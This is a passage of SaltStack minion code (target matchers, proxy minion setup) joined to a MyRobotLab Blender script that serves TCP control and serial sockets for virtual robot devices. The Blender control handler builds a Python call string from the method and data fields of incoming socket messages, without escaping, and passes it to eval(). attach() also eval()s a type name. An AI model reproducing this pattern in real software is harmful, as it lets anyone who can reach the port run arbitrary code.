self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(six.text_type(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.data.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: %s', tgt)
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.data.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
# Target is an address?
tgt = ipaddress.ip_address(tgt)
except: # pylint: disable=bare-except
try:
# Target is a network?
tgt = ipaddress.ip_network(tgt)
except: # pylint: disable=bare-except
log.error('Invalid IP/CIDR target: %s', tgt)
return []
proto = 'ipv{0}'.format(tgt.version)
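        # The minion's addresses are read from the 'ipv4'/'ipv6' grains; a
        # single address is matched by membership, a network by subnet
        # containment.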
grains = self.opts['grains']
if proto not in grains:
match = False
elif isinstance(tgt, (ipaddress.IPv4Address, ipaddress.IPv6Address)):
match = six.text_type(tgt) in grains[proto]
else:
match = salt.utils.network.in_subnet(tgt, grains[proto])
return match
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: %s', exc)
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
nodegroups = self.opts.get('nodegroups', {})
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: %s ? %s', self.opts['id'], tgt)
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
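        # Each engine match is rendered as the string 'True' or 'False',
        # joined with the boolean operators and eval'd at the end, e.g.
        # 'G@os:Ubuntu and web*' -> 'True and True' -> True (illustrative).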
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
# we make a shallow copy in order to not affect the passed in arg
words = tgt[:]
while words:
word = words.pop(0)
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": %s', word)
return False
if word == 'not':
if not results[-1] in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
                    # sequence starts with a binary operator, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: %s', word)
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# if we encounter a node group, just evaluate it in-place
decomposed = salt.utils.minions.nodegroup_comp(target_info['pattern'], nodegroups)
if decomposed:
words = decomposed + words
continue
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error(
'Unrecognized target engine "%s" for target '
'expression "%s"', target_info['engine'], word
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
six.text_type(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(six.text_type(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match %s ? "%s" => "%s"', self.opts['id'], tgt, results)
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error(
'Invalid compound target: %s for results: %s', tgt, results)
return False
return False
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
log.debug("subclassed _post_master_init")
if self.connected:
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
if self.opts.get('proxy_merge_pillar_in_opts'):
# Override proxy opts with pillar data when the user required.
self.opts = salt.utils.dictupdate.merge(self.opts,
self.opts['pillar'],
strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
elif self.opts.get('proxy_mines_pillar'):
# Even when not required, some details such as mine configuration
# should be merged anyway whenever possible.
if 'mine_interval' in self.opts['pillar']:
self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
if 'mine_functions' in self.opts['pillar']:
general_proxy_mines = self.opts.get('mine_functions', [])
specific_proxy_mines = self.opts['pillar']['mine_functions']
try:
self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
except TypeError as terr:
                    log.error(
                        'Unable to merge mine functions from the pillar into '
                        'the opts for proxy %s: %s', self.opts['id'], terr
                    )
fq_proxyname = self.opts['proxy']['proxytype']
# Need to load the modules so they get all the dunder variables
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
# Pull in the utils
self.utils = salt.loader.utils(self.opts)
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
# And re-load the modules so the __proxy__ variable gets injected
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
        # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
# Start engines here instead of in the Minion superclass __init__
# This is because we need to inject the __proxy__ variable but
# it is not setup until now.
self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
self.process_manager, proxy=self.proxy)
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=-1, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
if self.connected and self.opts['pillar']:
# The pillar has changed due to the connection to the master.
# Reload the functions so that they can use the new pillar data.
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
if hasattr(self, 'schedule'):
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if not hasattr(self, 'schedule'):
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners,
cleanup=[master_event(type='alive')],
proxy=self.proxy)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if (self.opts['transport'] != 'tcp' and
self.opts['master_alive_interval'] > 0):
self.schedule.add_job({
master_event(type='alive', master=self.opts['master']):
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
if self.opts['master_failback'] and \
'master_list' in self.opts and \
self.opts['master'] != self.opts['master_list'][0]:
self.schedule.add_job({
master_event(type='failback'):
{
'function': 'status.ping_master',
'seconds': self.opts['master_failback_interval'],
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {'master': self.opts['master_list'][0]}
}
}, persist=True)
else:
self.schedule.delete_job(master_event(type='failback'), persist=True)
else:
self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
self.schedule.delete_job(master_event(type='failback'), persist=True)
# proxy keepalive
proxy_alive_fn = fq_proxyname+'.alive'
if (proxy_alive_fn in self.proxy
and 'status.proxy_reconnect' in self.functions
and self.opts.get('proxy_keep_alive', True)):
# `proxy_keep_alive` defaults to True; only when it is explicitly set to False is the reconnect job not scheduled
self.schedule.add_job({
'__proxy_keepalive':
{
'function': 'status.proxy_reconnect',
'minutes': self.opts.get('proxy_keep_alive_interval', 1), # by default, check once per minute
'jid_include': True,
'maxrunning': 1,
'return_job': False,
'kwargs': {
'proxy_name': fq_proxyname
}
}
}, persist=True)
self.schedule.enable_schedule()
else:
self.schedule.delete_job('__proxy_keepalive', persist=True)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
@classmethod
def _target(cls, minion_instance, opts, data, connected):
if not minion_instance:
minion_instance = cls(opts)
minion_instance.connected = connected
if not hasattr(minion_instance, 'functions'):
# Need to load the modules so they get all the dunder variables
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
# Pull in the utils
minion_instance.utils = salt.loader.utils(minion_instance.opts)
# Then load the proxy module
minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
# And re-load the modules so the __proxy__ variable gets injected
functions, returners, function_errors, executors = (
minion_instance._load_modules(grains=opts['grains'])
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
minion_instance.proxy.pack['__salt__'] = minion_instance.functions
minion_instance.proxy.pack['__ret__'] = minion_instance.returners
minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
minion_instance.proxy.pack['__utils__'] = minion_instance.utils
# Reload all modules so all dunder variables are injected
minion_instance.proxy.reload_modules()
fq_proxyname = opts['proxy']['proxytype']
minion_instance.module_executors = minion_instance.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
proxy_init_fn(opts)
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.user.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
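# For reference, the 'proxy' configuration consumed here usually comes from pillar and
# looks roughly like this (proxytype and host values are purely illustrative):
#     proxy:
#       proxytype: dummy
#       host: 203.0.113.10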
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg: __utils__ needs __proxy__ and __proxy__ needs __utils__)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
Blender.py
|
# TODO
# way to dynamically add actuators & controllers
# http://www.blender.org/api/blender_python_api_2_60_6/bpy.ops.logic.html
import bge # blender game engine
import bpy # blender python interface
import math
import mathutils
import sys
from os.path import expanduser
import socket
import threading
import socketserver
import json
import traceback
import math
from math import *
import mathutils
# FIXES
# clean/complete shutdown
# out of bge mode and back in - should still work - removal of all globals
# already started .... on start
# BGE - restart does not work !!!
# when "run script" bge does not exist
# BGE - restarted - and sockets left running - everything reconnects fine BUT GRAPHICS DONT MOVE !!
# MRL is disconnected - BGE terminates then restarts - connections look normal but mouth does not move !
# WORKS
# when MRL is terminated and BGE is left running - can connect multiple times & threads appear to die as expected
# regular start/stop appears to work
home = expanduser("~")
print (home)
print (sys.version)
print (sys.path)
controlPort = 8989
serialPort = 9191
readyToAttach = None # must I remove this too ?
#-------- obj begin ---------------
# ['__class__', '__contains__', '__delattr__', '__delitem__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__gt__','__hash__', '__init__', '__le__', '__lt__', '__ne__', '__new__', '__reduce__','__reduce_ex__', '__repr__', '__setattr__', '__setitem__', '__sizeof__', '__str__', '__subclasshook__', 'actuators', 'addDebugProperty', 'alignAxisToVect', 'angularVelocity', 'applyForce', 'applyImpulse', 'applyMovement', 'applyRotation', 'applyTorque', 'attrDict', 'children', 'childrenRecursive', 'collisionCallbacks','color', 'controllers', 'debug', 'debugRecursive', 'disableRigidBody', 'enableRigidBody', 'endObject', 'get', 'getActionFrame', 'getAngularVelocity', 'getAxisVect', 'getDistanceTo', 'getLinearVelocity', 'getPhysicsId', 'getPropertyNames','getReactionForce', 'getVectTo', 'getVelocity', 'groupMembers', 'groupObject', 'invalid', 'isPlayingAction', 'life', 'linVelocityMax', 'linVelocityMin', 'linearVelocity', 'localAngularVelocity', 'localInertia', 'localLinearVelocity', 'localOrientation', 'localPosition', 'localScale', 'localTransform', 'mass', 'meshes','name', 'occlusion', 'orientation', 'parent', 'playAction', 'position', 'rayCast', 'rayCastTo', 'record_animation', 'reinstancePhysicsMesh', 'removeParent', 'replaceMesh', 'restoreDynamics', 'scaling', 'scene', 'sendMessage', 'sensors', 'setActionFrame', 'setAngularVelocity', 'setCollisionMargin', 'setLinearVelocity','setOcclusion', 'setParent', 'setVisible', 'state', 'stopAction', 'suspendDynamics', 'timeOffset', 'visible', 'worldAngularVelocity', 'worldLinearVelocity', 'worldOrientation', 'worldPosition', 'worldScale', 'worldTransform']
#-------- obj end ---------------
print("-------- scene begin ---------------")
scene = bge.logic.getCurrentScene()
# help(scene)
print(dir(scene))
print("-------- scene end ---------------")
"""
obj = scene.objects["i01.head.jaw"]
print("-------- obj begin ---------------")
print(dir(obj))
print("-------- obj end ---------------")
print("localOrientation", obj.localOrientation)
print("localPosition", obj.localPosition)
print("----- actuator begin ----")
print(dir(obj.actuators["i01.head.jaw"]))
print("----- actuator end ----")
actuator = obj.actuators["i01.head.jaw"]
print("dRot", actuator.dRot)
print("angV", actuator.angV)
obj.applyRotation([ 0.1, 0.0, 0.0], True)
print("localOrientation", obj.localOrientation)
# euler rotations
xyz = obj.localOrientation.to_euler()
xyz[0] = math.radians(10)
obj.localOrientation = xyz.to_matrix()
# create a rotation matrix
mat_rot = mathutils.Matrix.Rotation(math.radians(10.0), 4, 'X')
print("mat_rot", mat_rot)
# mat_rot = mathutils.Matrix.Rotation(math.radians(10.0), 3, 'X')
# extract components back out of the matrix
#loc, rot, sca = obj.localOrientation.decompose()
#print(loc, rot, sca)
#obj.applyRotation(mat_rot)
#obj.localTransform = mat_rot
#obj.localOrientation = mat_rot.to_3x3()
"""
# TODO - derive from json object - so we can control correct encoding
# http://stackoverflow.com/questions/3768895/python-how-to-make-a-class-json-serializable
class MyRobotLab:
"""the MyRobotLab class - mrl manages the control and serial servers which the middleware interfaces with"""
def __init__(self):
self.control = None
self.controlServer = None
self.serialServer = None
self.virtualDevices = {}
self.blenderObjects = {}
self.version = "0.9"
self.pos = 0.0
def toJson(self):
ret = "{'control': "
ret += "'initialized'" if (self.control != None) else "'None'"
ret += ", 'controlServer': "
ret += "'initialized'" if (self.controlServer != None) else "'None'"
ret += ", 'serialServer': "
ret += "'initialized'" if (self.serialServer != None) else "'None'"
ret += ", 'virtualDevices': ["
vdJson = []
print(self.virtualDevices)
for vd in self.virtualDevices:
print("virtual device [" + vd + "]")
#vdJson.append("'" + vd + "': " + self.virtualDevices[vd])
#vdJson.append("'" + vd + "': '" + vd + "'")
ret += ",".join(self.virtualDevices)
ret += "]"
ret += "}"
return ret
def toJson():
return bpy.mrl.toJson()
# this is to initialize the mrl data
# it needs persist longer than just game mode
if (not hasattr(bpy, "mrl")):
print("initializing MyRobotLab")
bpy.mrl = MyRobotLab()
else:
print("MyRobotLab already initialized")
class Message:
"""an MRL message definition in Python"""
def __init__(self):
self.msgID = 0
self.timeStamp = 0
self.name = ""
self.sender = ""
self.method = ""
self.sendingMethod = ""
self.data = []
self.historyList = []
#def __init__(self, j):
#self.__dict__ = json.loads(j)
class VirtualDevice:
"""a virtual device Servo, Arduino, Lidar, etc"""
def __init__(self, name, type):
self.name = name
self.type = type
self.serialHandler = None
self.service = None
def toJson(self):
ret = "{'name':'" + self.name + "', 'type':'" + self.type + "',"
ret += "'serialHandler': '"
ret += "'initialized'" if (self.serialHandler != None) else "'None'"
ret += "'service': '"
ret += "'initialized'" if (self.service != None) else "'None'"
ret += "}"
def getVersion():
print("version is ", bpy.mrl.version)
return bpy.mrl.version
# TODO remove?
def Cube():
global a
#print ("cube ", a)
scene = bge.logic.getCurrentScene() #Locate current device
cont = bge.logic.getCurrentController()
own = cont.owner
xyz = own.localOrientation.to_euler() #Extract the Rotation Data
xyz[0] = math.radians(a) #PreLoad your RX data
#xyz[0] x Rotation axis
#xyz[1] y Rotation axis
#xyz[2] z Rotation axis
own.localOrientation = xyz.to_matrix() #Apply your rotation data
def createJsonMsg(method, data):
msg = Message()
msg.name = "blender"
msg.method = method
msg.sendingMethod = method
msg.data.append(data)
retJson = json.dumps(msg.__dict__)
# FIXME - better terminator ?
retJson = retJson + "\n"
return retJson.encode()
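# For example (illustrative values), createJsonMsg("onError", "boom") yields one
# newline-terminated JSON line roughly like:
#   {"msgID": 0, "timeStamp": 0, "name": "blender", "sender": "", "method": "onError",
#    "sendingMethod": "onError", "data": ["boom"], "historyList": []}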
def onError(msg):
print(msg)
request = bpy.mrl.control.request
request.sendall(createJsonMsg("onError", msg))
def stopServer():
print ("stopping controlServer")
controlServer = bpy.mrl.controlServer
if (controlServer != None):
controlServer.shutdown()
else:
print("controlServer already stopped")
bpy.mrl.controlServer = None
print ("stopping serialServer")
serialServer = bpy.mrl.serialServer
if (serialServer != None):
serialServer.shutdown()
else:
print("serialServer already stopped")
bpy.mrl.serialServer = None
#for controlHandler in controlHandlers
# print (controlHandler)
#controlHandlers[controlHandler].listening = False
def startServer():
global controlPort
controlServer = bpy.mrl.controlServer
if (controlServer == None):
##### control server begin ####
controlServer = ThreadedTCPServer(("localhost", controlPort), ControlHandler)
bpy.mrl.controlServer = controlServer
ip, port = controlServer.server_address
# Start a thread with the controlServer -- that thread will then start one
# more thread for each request
controlThread = threading.Thread(target=controlServer.serve_forever)
# Exit the controlServer thread when the main thread terminates
controlThread.daemon = True
controlThread.start()
print ("control server loop running in thread: ", controlThread.name, " port ", controlPort)
##### control server end ####
##### serial server begin ####
serialServer = ThreadedTCPServer(("localhost", serialPort), SerialHandler)
bpy.mrl.serialServer = serialServer
ip, port = serialServer.server_address
# Start a thread with the serialServer -- that thread will then start one
# more thread for each request
serialThread = threading.Thread(target=serialServer.serve_forever)
# Exit the serialServer thread when the main thread terminates
serialThread.daemon = True
serialThread.start()
print ("serial server loop running in thread: ", serialThread.name, " port ", serialPort)
##### serial server end ####
else:
print ("servers already started")
# attach a device - control message comes in and sets up
# name and type - next connection on the serial port will be
# the new device
# FIXME - catch throw on class not found
def attach(name, type):
global readyToAttach
# adding name and type to the new virtual device
newDevice = VirtualDevice(name, type)
# constructing the correct type
newDevice.service = eval(type + "('" + name + "')")
bpy.mrl.virtualDevices[name] = newDevice
readyToAttach = name
print("onAttach " + str(name) + " " + str(type) + " SUCCESS - ready for serial connection")
# print("<--- sending control onAttach(" + str(name) + ")")
# control.request.sendall(createJsonMsg("onAttach", name))
return name
class ControlHandler(socketserver.BaseRequestHandler):
listening = False
def handle(self):
bpy.mrl.control = self
#data = self.request.recv(1024).decode()
myThread = threading.current_thread()
print("---> client connected to control socket thread {} port {}".format(myThread.name, controlPort))
buffer = ''
listening = True
# change socket into a file
f = self.request.makefile()
while listening:
try:
# Try to receive some data
# data = self.request.recv(1024).decode()
# TODO - refactor to loading Message object
# jsonCmd = self.request.recv(1024).decode().strip()
jsonCmd = f.readline()
print("incoming json cmd -<" + jsonCmd + ">-")
controlMsg = json.loads(jsonCmd)
print("---> control: controlMsg ", controlMsg)
method = controlMsg["method"]
#### command processing begin ####
command = method + "("
cnt = 0
# unload parameter array
data = controlMsg["data"]
if (len(data) > 0):
for param in data:
cnt += 1
if isinstance(param, int):
command = command + str(param)
else:
command = command + "'" + param + "'"
if (len(data) != cnt):
command = command + ","
command = command + ")"
print ("*** command " , command, " ***")
ret = eval(command)
retMsg = Message()
retMsg.name = "blender"
retMsg.method = "on" + method[0:1].capitalize() + method[1:]
retMsg.sendingMethod = controlMsg["method"]
retMsg.data.append(ret)
retJson = json.dumps(retMsg.__dict__)
print ("<--- control: ret" , retJson)
self.request.sendall(retJson.encode())
# TODO - better way to send full json message ? better way to parse it?
self.request.sendall("\n".encode())
#### command processing end ####
except Exception as e:
print ("control handler error: ", e)
print (traceback.format_exc())
#run_main_loop = False
listening = False
print("terminating control handler", myThread.name, controlPort)
class SerialHandler(socketserver.BaseRequestHandler):
listening = False
service = None
name = ""
def handle(self):
global readyToAttach
myThread = threading.current_thread()
if (readyToAttach in bpy.mrl.virtualDevices):
print("++++attaching " + str(readyToAttach) + " serial handler++++ thread {} port {}".format(myThread.name, serialPort))
bpy.mrl.virtualDevices[readyToAttach].serialHandler = self
service = bpy.mrl.virtualDevices[readyToAttach].service
self.name = readyToAttach
else:
print("could not attach serial device")
# ERROR - we need a name to attach
onError("XXXX incoming serial connection but readyToAttach [" + str(readyToAttach) + "] XXXX")
return
listening = True
while listening:
try:
data = self.request.recv(1024)
service.handle(data)
except Exception as e:
print ("serial handler error: ", e)
print (traceback.format_exc())
#run_main_loop = False
listening = False
print("terminating serial handler", myThread.name, serialPort)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
class Arduino:
MRLCOMM_VERSION = 21
##### PYTHON GENERATED DEFINITION BEGIN ######
# {publishMRLCommError Integer}
PUBLISH_MRLCOMM_ERROR = 1
# {getVersion}
GET_VERSION = 2
# {publishVersion Integer}
PUBLISH_VERSION = 3
# {analogReadPollingStart Integer}
ANALOG_READ_POLLING_START = 4
# {analogReadPollingStop Integer}
ANALOG_READ_POLLING_STOP = 5
# {analogWrite Integer Integer}
ANALOG_WRITE = 6
# {digitalReadPollingStart Integer}
DIGITAL_READ_POLLING_START = 7
# {digitalReadPollingStop Integer}
DIGITAL_READ_POLLING_STOP = 8
# {digitalWrite Integer Integer}
DIGITAL_WRITE = 9
# {motorAttach String String Integer Integer Integer}
MOTOR_ATTACH = 10
# {motorDetach String}
MOTOR_DETACH = 11
# {motorMove String}
MOTOR_MOVE = 12
# {motorMoveTo String double}
MOTOR_MOVE_TO = 13
# {pinMode Integer Integer}
PIN_MODE = 14
# {publishCustomMsg Integer}
PUBLISH_CUSTOM_MSG = 15
# {publishLoadTimingEvent Long}
PUBLISH_LOAD_TIMING_EVENT = 16
# {publishPin Pin}
PUBLISH_PIN = 17
# {publishPulse Integer}
PUBLISH_PULSE = 18
# {publishServoEvent Integer}
PUBLISH_SERVO_EVENT = 19
# {publishSesorData SensorData}
PUBLISH_SESOR_DATA = 20
# {publishStepperEvent StepperEvent}
PUBLISH_STEPPER_EVENT = 21
# {publishTrigger Pin}
PUBLISH_TRIGGER = 22
# {pulseIn int int int int}
PULSE_IN = 23
# {sensorAttach String}
SENSOR_ATTACH = 24
# {sensorPollingStart String int}
SENSOR_POLLING_START = 25
# {sensorPollingStop String}
SENSOR_POLLING_STOP = 26
# {servoAttach String Integer}
SERVO_ATTACH = 27
# {servoDetach Servo}
SERVO_DETACH = 28
# {servoSweepStart String int int int}
SERVO_SWEEP_START = 29
# {servoSweepStop String}
SERVO_SWEEP_STOP = 30
# {servoWrite String Integer}
SERVO_WRITE = 31
# {servoWriteMicroseconds String Integer}
SERVO_WRITE_MICROSECONDS = 32
# {setDebounce int}
SET_DEBOUNCE = 33
# {setDigitalTriggerOnly Boolean}
SET_DIGITAL_TRIGGER_ONLY = 34
# {setLoadTimingEnabled boolean}
SET_LOAD_TIMING_ENABLED = 35
# {setPWMFrequency Integer Integer}
SET_PWMFREQUENCY = 36
